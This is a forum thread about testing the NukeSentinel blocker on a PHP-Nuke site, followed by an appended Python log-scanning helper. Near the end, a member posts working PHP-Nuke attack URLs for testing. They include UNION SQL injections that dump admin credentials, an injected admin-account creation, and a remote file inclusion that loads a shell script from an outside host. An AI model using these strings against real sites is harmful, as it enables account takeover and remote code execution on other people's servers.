Testing Sentinel
Hi Guys
I've recently installed Sentinel, I think I've set all the blockers correctly, but is there a way to test if Sentinel is working properly?
I have read the Sentinel docs, and this is what I came away with...
.staccess is where the passwords are stored for the AUTH access (which is working btw)
.htaccess is where I had to copy the block of code from Sentinel's admin section to make the AUTH thing work. That's all that is in that file atm.
.tfaccess was empty, but now it's got the following:
Code:
24.89.*.*|| da2f46e41370bfc5f1cf5392486ddf19 || 116311279 || PHPSESSID
68.226..*.*|| f6823970a3829aebed3e04bc4352 || 116311282 || PHPSESSID
70.145..*.*|| 941f87e22596f6a9db7cea56572b || 116311284 || PHPSESSID
68.226..*.*|| f6823970a3329aebed3e04bc4352 || 116311304 || PHPSESSID
207.200.*.*|| abe624da7fab0462fe7db43ccb65 || 116311355 || PHPSESSID
75.177.*.*|| d20ad7b5b710cbee4ec4e212ac5b || 116311387 || PHPSESSID
Are these a good sign?
Apparently blocked IPs should be added somewhere, but either I'm getting lucky and nobody is trying to hack my site, or I may have something set up wrong. I have turned on all of the blockers, but nothing appears to be getting logged, apart from the above.
Please could someone explain to me, or help me test please?
Thanks guys
Mal
It's functioning but it ain't blocking further access.
I can still access the site after.
Quote:
You have been blocked from entering this site.
You have attempted a Union attack on this site.
All of the following information has been gathered to assist the webmaster should this need to be reported to local or federal law enforcement.
If you think this is a mistake you can contact the site webmaster at malekii(at)kohcenter(dot)com.
Be SURE to include the following information in any email!
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1) Gecko/20061010 Firefox/2.0
Remote Address: 82.32.209.113
Client IP: none
Forwarded For: none
Date Blocked: 2006-11-09 @ 17:47:07 CST GMT -0600
Block expires: Unknown
Quote:
UNION Blocker Settings
Activate: Default Page
Write to htaccess: Yes
Forward To:
IP Block Type: Full IP (127.2.3.4)
Default Page: Default
Email IP lookup: Not Available
Reason:
Block Duration: Permanent
These are my settings on the Union blocker thing
Well that's no good, all it does is show people what I quoted above.
The settings on all blockers should be at least email, block and default page.
Ahh, gotcha.
I thought the .htaccess was the important bit, and that the page was just how you told them to get lost lol
On an aside, are there standard tests such as the one you just did, that I can learn? Is it a script? Do you have a URL so that I can take a look please?
Cheers on the config issue Darren, I'll do that now.
Not really, I just tried a URL string that had been tried here and blocked.
I'll post up a few for you in a bit.
All blockers now set to Email, block and default page. Top man!
Thanks Darren, appreciate your help mate.
Oooh, can't access your site now.
Quote:
Forbidden
You don't have permission to access /index.php on this server.
Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.
hehe, I think you're my first "Shameful Hacker" LOL
I'll unban you, one sec 
Oh the shame LOL
Can see it again now.
haha
Thanks for testing that with me, I feel much happier now I know it's working. When you have a minute, would you mind posting up those strings for me please? No rush on it, whenever you have the time.
Thanks again Dar.
Quote:
modules.php?name=Downloads&d_op=viewsdownload&sid=-1/* */UNION/* */SELECT/* */0,0,aid,pwd,0,0,0,0,0,0,0,0/* */FROM/* */nuke_authors/* */WHERE/* */radminsuper=1/* */LIMIT/* */1/*
modules.php?name=Search&type=comments&query=not123exists&instory=/* */UNION/* */SELECT/* */0,0,pwd,0,aid/* */FROM/* */nuke_authors
index.php?add_aid=adm&add_name=adm&add_pwd=111&add_email=admin@phpnuke.org&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=AddAuthor&Submit=%D1%EE%E7%E4%E0%F2%FC+%E0%E4%EC%E8%ED%E0
modules.php?name=Forums&file=viewtopic&t=2388&xxx=http://freecfm.com/c/coldfsrv/shellnew.php?c=d&d=/usr/home/public_html/forum&highlight=%2527.include($_GET[xxx]).include%2527
Just a few random ones.
Thanks a bunch Dar
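The test strings quoted in the thread hide their payloads behind SQL comment padding, a base64 value and double URL-encoding, so a plain substring search of an access log misses them. As an added example (not part of the thread and not NukeSentinel's own code), this Python log-triage helper normalizes each query parameter before matching; the regexes, finding labels and sample URIs are constructed for illustration, and treating the `admin` parameter as base64 is an assumption based on the third quoted string.

```python
import base64
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

SQL_COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)   # /* */ padding, or an unterminated /*
UNION = re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)   # parameter value that is itself a URL
CODE_CALL = re.compile(r"\b(?:include|require|eval)\s*\(", re.I)

# Constructed sample request URIs, shortened from the strings quoted in the thread.
SAMPLES = [
    "/modules.php?name=Downloads&sid=-1/* */UNION/* */SELECT/* */0,aid,pwd/* */FROM/* */nuke_authors/*",
    "/index.php?op=AddAuthor&add_aid=adm&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox",
    "/modules.php?name=Forums&xxx=http://example.invalid/x.txt&highlight=%2527.include($_GET[xxx]).include%2527",
    "/modules.php?name=News&file=article&sid=12",
]


def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding such as %2527 -> %27 -> '."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return value


def classify(request_uri):
    """Return sorted finding labels for one request URI."""
    findings = set()
    for name, raw in parse_qsl(urlsplit(request_uri).query, keep_blank_values=True):
        value = SQL_COMMENT.sub(" ", fully_unquote(raw))
        if UNION.search(value):
            findings.add("union")
        if REMOTE_URL.match(value):
            findings.add("remote-url-param")
        if CODE_CALL.search(value):
            findings.add("code-injection")
        if name == "admin":  # assumption: base64-encoded, as in the thread's third string
            try:
                inner = base64.b64decode(value, validate=True).decode("latin-1")
            except ValueError:
                inner = ""
            if UNION.search(SQL_COMMENT.sub(" ", inner)):
                findings.add("union-in-base64-admin")
    return sorted(findings)


if __name__ == "__main__":
    for uri in SAMPLES:
        print(classify(uri), uri[:60])
```

Running the same function over the request column of an access log shows whether a blocker's log entries line up with what actually arrived at the server.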